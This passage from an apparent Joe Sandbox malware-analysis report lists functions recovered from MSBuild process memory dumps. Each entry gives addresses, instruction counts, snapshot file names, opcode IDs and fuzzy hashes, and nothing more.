                          • Instruction Fuzzy Hash: 9F810A74A00214CFCB54DFA8C594AADBBF2FF88314F254169E90AAB365CB71AD46CF50
                          Function 05904610 Relevance: .2, Instructions: 179COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6c2fa889d0bcc49e6162dc90825441d993765aa0f8e83a19049326451d08aad6
                          • Instruction ID: 36879324d2b47348f75509d1182e96d58728aa0161d930e2d6297ad0e27445bb
                          • Opcode Fuzzy Hash: 6c2fa889d0bcc49e6162dc90825441d993765aa0f8e83a19049326451d08aad6
                          • Instruction Fuzzy Hash: 5A615E35E1021A8FDF14CFA4C5546EEBBB6FF89304F14892AE905BB394EB719945CB80
                          Function 05AC0530 Relevance: .2, Instructions: 168COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 562c21378078db26073897b0bff06d09ce16eee65a37370a97311bc4fe61987d
                          • Instruction ID: 56b32e44918bdc1702225384e19f6f1f3dd6d6a94c326552d3d06c8af7b05833
                          • Opcode Fuzzy Hash: 562c21378078db26073897b0bff06d09ce16eee65a37370a97311bc4fe61987d
                          • Instruction Fuzzy Hash: 2A614D35710609CFCB15DF68C558AADBBB2BF89700F1085A9D4029B3A0DB74ED86CB90
                          Function 058F66B0 Relevance: .2, Instructions: 161COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e031379762dd6d71e36f11b8cbfd7f0307b9402230b5c0135809fc61ba661340
                          • Instruction ID: 86de4c7710436852af402988fc17a93ccc0913214809108d3454cd66881a351d
                          • Opcode Fuzzy Hash: e031379762dd6d71e36f11b8cbfd7f0307b9402230b5c0135809fc61ba661340
                          • Instruction Fuzzy Hash: A351A8347181248BDB15AA2AE554B3B3A9BFB8CA59F544319DE02CB388FF38CC4187D1
                          Function 05AAE6BA Relevance: .2, Instructions: 159COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ebae4a8a244a0b2078c5efec5b18302c412abacc9fb92b3f2ad321db7e0426e9
                          • Instruction ID: 48e3b7b725e2df7022b5f92af988cd853c58b4a28632b440cd2fec8a7661ff17
                          • Opcode Fuzzy Hash: ebae4a8a244a0b2078c5efec5b18302c412abacc9fb92b3f2ad321db7e0426e9
                          • Instruction Fuzzy Hash: F9610735B10614DFDB14DF68C498EAEBBB6BF88710F1481A9E5169B365CB30ED41CB90
                          Function 05AC2E88 Relevance: .2, Instructions: 153COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6944c4410316b2ea408d6e45e6d38c0801960835a36cc43c7b729e3508d3dd8a
                          • Instruction ID: af0129b2927d926c3693d7e57405dea694e4b5726bd6d10f93c8598c066ceaf3
                          • Opcode Fuzzy Hash: 6944c4410316b2ea408d6e45e6d38c0801960835a36cc43c7b729e3508d3dd8a
                          • Instruction Fuzzy Hash: 6451D6357046258FCB24DB29D080A6ABFF6FFC5315B1489AED54AC7742CA72E843CB84
                          Function 05AC4308 Relevance: .1, Instructions: 149COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1aed618930db22db659c7ee1ff41a59b1e4012d70af270174e7d179d66a4570a
                          • Instruction ID: 8de68a4f4a7e89edd59e7dc05f899042842e67d3e34d17c91c320f14e138f270
                          • Opcode Fuzzy Hash: 1aed618930db22db659c7ee1ff41a59b1e4012d70af270174e7d179d66a4570a
                          • Instruction Fuzzy Hash: 0A519F30A14214CFDF14CB59E468FAD7BB7FB88312F6180A9E5069B789DB749C42CB45
                          Function 05AC630A Relevance: .1, Instructions: 147COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 03d798856c6b19ef39490c7d2cb50768d0776326a926db16ef56f467df8882b6
                          • Instruction ID: 1d220947f4fc99efdb53799e7cd65dddbfe5974df2459e545cac336345470f0b
                          • Opcode Fuzzy Hash: 03d798856c6b19ef39490c7d2cb50768d0776326a926db16ef56f467df8882b6
                          • Instruction Fuzzy Hash: F4516C34A04208CFEB14CB5DE689FADBBB3FB88311F2580A9E502A7399D7759C45CB51
                          Function 05AC4310 Relevance: .1, Instructions: 147COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6aceb8042258f87e8f73bdb5ea45f0085619625c0638f9a9a351533e52a9c47c
                          • Instruction ID: f9a159dff82b42a2a4c187d89afa551c2215a778c0d646f8ddbc7054f01dc3b9
                          • Opcode Fuzzy Hash: 6aceb8042258f87e8f73bdb5ea45f0085619625c0638f9a9a351533e52a9c47c
                          • Instruction Fuzzy Hash: 6851BF30614214CFDF14CB19E468FAD7BB7FB88312F6080A9E5029B789DB789C82CB45
                          Function 05AC77D0 Relevance: .1, Instructions: 145COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2edfca2ffefc5fd3b92c86a560ae3f79709c35c6602c62c9cd2b158f02834dae
                          • Instruction ID: b130c3185b1b874e1156a597c929ae434eec82fcae4443d155a17ec9b2224222
                          • Opcode Fuzzy Hash: 2edfca2ffefc5fd3b92c86a560ae3f79709c35c6602c62c9cd2b158f02834dae
                          • Instruction Fuzzy Hash: D7515930A08105CBEB14DA1AE445BBA7FA7F784314F2480ADE2169B389CB706D86CF91
                          Function 05AC6318 Relevance: .1, Instructions: 144COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 490ad03a854b0db720035155cac2b59e4246a7ac8237427329b6da03c41ba0f1
                          • Instruction ID: af29946713e08c28c63824b8f7f175864aa87a3953fc2f89f10d6560fb48c409
                          • Opcode Fuzzy Hash: 490ad03a854b0db720035155cac2b59e4246a7ac8237427329b6da03c41ba0f1
                          • Instruction Fuzzy Hash: 41516B34A04208CFEB14CB5DE589FADBBB3FB88311F2480A9E502A7399DB759C45CB51
                          Function 05AC7CA8 Relevance: .1, Instructions: 143COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bda663829878768d45660a2ba060db738ca78d91ea99a1bd90dfbd0af8bb92fc
                          • Instruction ID: 383b764e926a27c602faf1ec6cc3177aaefaa8b33197808aafc248d72861c9be
                          • Opcode Fuzzy Hash: bda663829878768d45660a2ba060db738ca78d91ea99a1bd90dfbd0af8bb92fc
                          • Instruction Fuzzy Hash: 5D514C34B08104CFEB18EB69E458BAA7BB7FB88311F5481ADD41697399EB359C41CF90
                          Function 05AA95A8 Relevance: .1, Instructions: 143COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 808f9d725a31c9429656640e7781d702151a660e34dd6193d11c428d2fcfc5fd
                          • Instruction ID: 31080fd9ddf01ed26718c47a8205840055409e0d6f6ecb92c31bd39c29e18e46
                          • Opcode Fuzzy Hash: 808f9d725a31c9429656640e7781d702151a660e34dd6193d11c428d2fcfc5fd
                          • Instruction Fuzzy Hash: 5A517C35B106099FDB04EF64E4A9AAEBBB6FF88701F108119F40297364DF34A946CB90
                          Function 05AC77E0 Relevance: .1, Instructions: 141COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f9249d84c41a90a68ed46b2315a60e1761f4b3acbef2cc7ba57389c58a24098f
                          • Instruction ID: d8f3207451bb37e6f9bc2757571a6472c57e8794ef72c78fa81872840c4587e5
                          • Opcode Fuzzy Hash: f9249d84c41a90a68ed46b2315a60e1761f4b3acbef2cc7ba57389c58a24098f
                          • Instruction Fuzzy Hash: 39513830A041058BEB14DA1AE445FBA7FA7F784315F2480ADE2169B389DB746D86CF91
                          Function 05AC3C90 Relevance: .1, Instructions: 139COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 08a852b570a1ebc1d5578544120e0fbe0877325cb3dc19f26b0a91c23548ee0a
                          • Instruction ID: 1d0870122235be64d70b9ff51156153eccf1933c764936af0e0fdcbe8d53dcf1
                          • Opcode Fuzzy Hash: 08a852b570a1ebc1d5578544120e0fbe0877325cb3dc19f26b0a91c23548ee0a
                          • Instruction Fuzzy Hash: EC51A630B192008BDF49EB59E044BAA7FA7FBC5710F55C46AD4069B349EB359C4ACBC1
                          Function 05AC446A Relevance: .1, Instructions: 138COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a1a6542b4128527892fa99ea7d05c5a48cb8dc423508fc1a418dad279fff6234
                          • Instruction ID: e73b9fc2f61c16f0b16dd5594b4a9b89e754931bc9c4513ff5b483a87a242be7
                          • Opcode Fuzzy Hash: a1a6542b4128527892fa99ea7d05c5a48cb8dc423508fc1a418dad279fff6234
                          • Instruction Fuzzy Hash: 38517D30614214CFDF14DB19E168FAD7BB7FB88312F6180A9E5029B799D7789C82CB45
                          Function 05AC6AC0 Relevance: .1, Instructions: 137COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a0e990eb67e25d3e7c6936a96d1b52daba73c4fb6ef7b3a7081c9887d7875d80
                          • Instruction ID: 8b04d74b1e7e450c384d24706d22f62abb42897777c2d45c81bbbfe0224cc185
                          • Opcode Fuzzy Hash: a0e990eb67e25d3e7c6936a96d1b52daba73c4fb6ef7b3a7081c9887d7875d80
                          • Instruction Fuzzy Hash: 9A516C70A08104CFEB18DB1DE488FADBBF7FB88315F1980A9E006A7289DB755C85CB50
                          Function 05AC7C9B Relevance: .1, Instructions: 135COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b74ad8aa8ad059fba28ed74d9e7819736c620ba0216bc294bb96a8482e0091b8
                          • Instruction ID: dccd34e9ef17773380f0086a85271981987c033813c47f742655058b7f5abe80
                          • Opcode Fuzzy Hash: b74ad8aa8ad059fba28ed74d9e7819736c620ba0216bc294bb96a8482e0091b8
                          • Instruction Fuzzy Hash: 4C516C34B08104CFEB18EB69E458BAA7BB7FB88311F5481ADD40697399EB359C41CF90
                          Function 05AC6AD0 Relevance: .1, Instructions: 133COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 96967c32c635adc06b938051ab6e0a5852c37a3acae84029420a01d8dddd4115
                          • Instruction ID: ef6363c002eb7acb9af790e415c4a2f740292ab9d33eb5df591aa0154d2eabc7
                          • Opcode Fuzzy Hash: 96967c32c635adc06b938051ab6e0a5852c37a3acae84029420a01d8dddd4115
                          • Instruction Fuzzy Hash: D6516C70A08114CFEB18DB1EE488FADBBF7FB88315F1980A9E00697289DB755C85CB51
                          Function 058F9D77 Relevance: .1, Instructions: 133COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0bde91a51b142829a557e03080ed580d10dc2a0dd488c56e883e392174d9eaeb
                          • Instruction ID: 14c2f9007c1e282e498c3fb97016e53a9b7dd2e3adf5bda0f50f646c2fa40dae
                          • Opcode Fuzzy Hash: 0bde91a51b142829a557e03080ed580d10dc2a0dd488c56e883e392174d9eaeb
                          • Instruction Fuzzy Hash: 3A516034B182148FE749EB26E45877A3BA7FB88315F618125DE06C7389EB399C42C781
                          Function 058F66A0 Relevance: .1, Instructions: 131COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 03fc9db37f11d18799ecf3ad606d5714c137a15b4c09511f84ce116aea47507d
                          • Instruction ID: 4348cb9acdf5ba92e346a8ef1171922f01046fb1448d0b82608ede25745244a0
                          • Opcode Fuzzy Hash: 03fc9db37f11d18799ecf3ad606d5714c137a15b4c09511f84ce116aea47507d
                          • Instruction Fuzzy Hash: 0041B1347181249BDB15AA26E811B3B3A67FB8CA29F144319EE02CB784FF38CC018791
                          Function 058F9D88 Relevance: .1, Instructions: 130COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 32838f1421e29ecca7108c516f8b65d37a436344b3d642852c14d477a98da92b
                          • Instruction ID: 6c6a0b830196dcd63b97d792b77e7eb04c6e9b3044fe46ea79742a2edbe902a2
                          • Opcode Fuzzy Hash: 32838f1421e29ecca7108c516f8b65d37a436344b3d642852c14d477a98da92b
                          • Instruction Fuzzy Hash: E9415E34B181148FE749FA26E05877A37A7FB88725F618125DE06C7389EB399C42C781
                          Function 05AC7528 Relevance: .1, Instructions: 126COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 014d1b2a4d14654471db54e96e2da7e16b95fd5bcaf489e21b4d432cc358b90e
                          • Instruction ID: ee165270e4573722f7d7064b4742940f6b4bd6b028d4614f181c0a0262f8b8d9
                          • Opcode Fuzzy Hash: 014d1b2a4d14654471db54e96e2da7e16b95fd5bcaf489e21b4d432cc358b90e
                          • Instruction Fuzzy Hash: B6416C30B08119CBEB19DB69E448FAD7BB3FB88311F1880ADD016A7394DA755C86CF90
                          Function 02AE693C Relevance: .1, Instructions: 124COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 693c3776a329e39d11d729f0767d406fd0401158398a96a6bc9bbb92a078a176
                          • Instruction ID: 75534752d6e60f5472f4e22f97a9d51136da5a5426c04e9810913f8a73e6b655
                          • Opcode Fuzzy Hash: 693c3776a329e39d11d729f0767d406fd0401158398a96a6bc9bbb92a078a176
                          • Instruction Fuzzy Hash: 7C51D874E01214DFCB18CF59D490A9DF7B2BF98314F24895AE8629B361CB31E846CF50
                          Function 05AC1AC8 Relevance: .1, Instructions: 124COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2834f405afea6c9adce7cb31127f82225c378e6404ebc326dc050ab0d84f5baf
                          • Instruction ID: b59fda12f97bb64be00aca64c3a282937ee4d1687c06aec817a8917672f48072
                          • Opcode Fuzzy Hash: 2834f405afea6c9adce7cb31127f82225c378e6404ebc326dc050ab0d84f5baf
                          • Instruction Fuzzy Hash: 18418F31F04B148BCB64DB68D5446AFBBF2FF85610F4489AED56AC7B90DA30E945CB80
                          Function 05AC7D0A Relevance: .1, Instructions: 123COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b1ba2e9a0f8da368c57246cedfb4552b652e1587591e1369bcd00a2b61750398
                          • Instruction ID: e4d53b58047935e42a803a953e63112058d7e49cc5d741bc2d61b4cec0376786
                          • Opcode Fuzzy Hash: b1ba2e9a0f8da368c57246cedfb4552b652e1587591e1369bcd00a2b61750398
                          • Instruction Fuzzy Hash: 66411834B081048FEB18EB69E458BB97BB7FB88311F5481ADD4068B399EB359C41CF90
                          Function 02AE4A48 Relevance: .1, Instructions: 122COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3afe0c0fe48272b35bae08ea5558f7e89f285852d419d9f51b2b4e9c3ea5b683
                          • Instruction ID: 5864a5aa7431f22d1ac9dac515fbd702b6a3b96fbe3a73e325d6b7b975050efe
                          • Opcode Fuzzy Hash: 3afe0c0fe48272b35bae08ea5558f7e89f285852d419d9f51b2b4e9c3ea5b683
                          • Instruction Fuzzy Hash: D7419F31E042088FCF54CFA9D4857AEBBB9FB88310F1485A9D809E7241EB359956CB94
                          Function 05AC7538 Relevance: .1, Instructions: 122COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6f030b06b3ca581f8e37cabb3adba86c2ff32b58a29888589c4cfb16bf24ac53
                          • Instruction ID: 8144dcc4b47ffafb112773bd288a2a02110bec37e60bd3e6d48955fc3665a03a
                          • Opcode Fuzzy Hash: 6f030b06b3ca581f8e37cabb3adba86c2ff32b58a29888589c4cfb16bf24ac53
                          • Instruction Fuzzy Hash: E2413C30B081198BEB59DB69E458FAD7BB7FB88311F1480ADD006A7294DA755C85CF90
                          Function 058F9DD1 Relevance: .1, Instructions: 122COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 16d11a430aa26182552c690af29df2a0670f3c27a7c1c046caf021ddd5fa5a20
                          • Instruction ID: baffbe161915718d807918a6e83c6153049f7e19df60e42b2f988504860ff80f
                          • Opcode Fuzzy Hash: 16d11a430aa26182552c690af29df2a0670f3c27a7c1c046caf021ddd5fa5a20
                          • Instruction Fuzzy Hash: CB413A3461C1148FE759FA26E058B7A3767FB88725F618125DE02CB389EB399C42D781
                          Function 02AE110A Relevance: .1, Instructions: 118COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c8ddea175a60f7e09ce24eedee1b45b59021766ef56ea6b25a604c269c059593
                          • Instruction ID: 768dd486617676976e0c4c064c895fa45b300913243bb47758a3482ca89bff83
                          • Opcode Fuzzy Hash: c8ddea175a60f7e09ce24eedee1b45b59021766ef56ea6b25a604c269c059593
                          • Instruction Fuzzy Hash: 66510534A01119DFDB54CBA8D998BADBBF2FF48304F1441A9E50AEB3A1DB749C02CB50
                          Function 05AA0928 Relevance: .1, Instructions: 117COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 90885829994fdf82a3a59d2fd4a992c338662c0b39ed5b58824baab83084c9a0
                          • Instruction ID: 2a11dcc49d5dd5e0216d06eb08910eb9c22b1a69fed01dfb3c02dd9f2a464b2c
                          • Opcode Fuzzy Hash: 90885829994fdf82a3a59d2fd4a992c338662c0b39ed5b58824baab83084c9a0
                          • Instruction Fuzzy Hash: 40412931B00205DFDB18DB69D899F6ABBB6FF88700F148429E916AB358DB75E805CB50
                          Function 05AC1EF8 Relevance: .1, Instructions: 116COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7f686d747e167658807de6e16f040ebf834077d70929e7721e67fdebbaeba0dd
                          • Instruction ID: ee111669a48de571618a9b69c41a61d0d16c7054030b2996bc159587d3a6161f
                          • Opcode Fuzzy Hash: 7f686d747e167658807de6e16f040ebf834077d70929e7721e67fdebbaeba0dd
                          • Instruction Fuzzy Hash: 66414D71A007049FCB25CF69C544A6ABBF2FF88300F148A9EE59697A91DB30F904CF91
                          Function 05AC2040 Relevance: .1, Instructions: 114COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 93b177fbc051abe7c3ff151eade27ba263b3e772a822fd54eb33c242afe23553
                          • Instruction ID: ee0043979b6421f4e4bac755db76c62ff7f15043573917f9458e26e3a3380f20
                          • Opcode Fuzzy Hash: 93b177fbc051abe7c3ff151eade27ba263b3e772a822fd54eb33c242afe23553
                          • Instruction Fuzzy Hash: CE411531B006089FCB149B68D804BAEBFB6FF85710F10456DEA5ADB290DB31E905CB91
                          Function 02AE7FB9 Relevance: .1, Instructions: 113COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d20af4e50a50c36b9f8b1f9d5421afb338894af4e257a21779d24b3160e0f322
                          • Instruction ID: 313f46e652a1a4c3d7b8697dea7405cf0dcd1063c10307087a75b1395b4802f0
                          • Opcode Fuzzy Hash: d20af4e50a50c36b9f8b1f9d5421afb338894af4e257a21779d24b3160e0f322
                          • Instruction Fuzzy Hash: 8E31D131B00A508FDF69DB65D894A2AB7A6FB88305F14866AE94783750DF39D903CB41
                          Function 02AE3D10 Relevance: .1, Instructions: 111COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ec3a9d95d8244a299b1f22fdfa13459e38de8a1d53f466c4353f6de7716f9b50
                          • Instruction ID: 56f07853e978d48d3a1b1208c35e1a241e48f52632ed35f2cf3ec46c60b4ad31
                          • Opcode Fuzzy Hash: ec3a9d95d8244a299b1f22fdfa13459e38de8a1d53f466c4353f6de7716f9b50
                          • Instruction Fuzzy Hash: 1F411874A00606CFCB24DF78C584AAEBBF2FF48320F208569D55AD7364DB31A946CB54
                          Function 05AC848E Relevance: .1, Instructions: 111COMMON
                          Download Yara Rule
                          Memory Dump Source
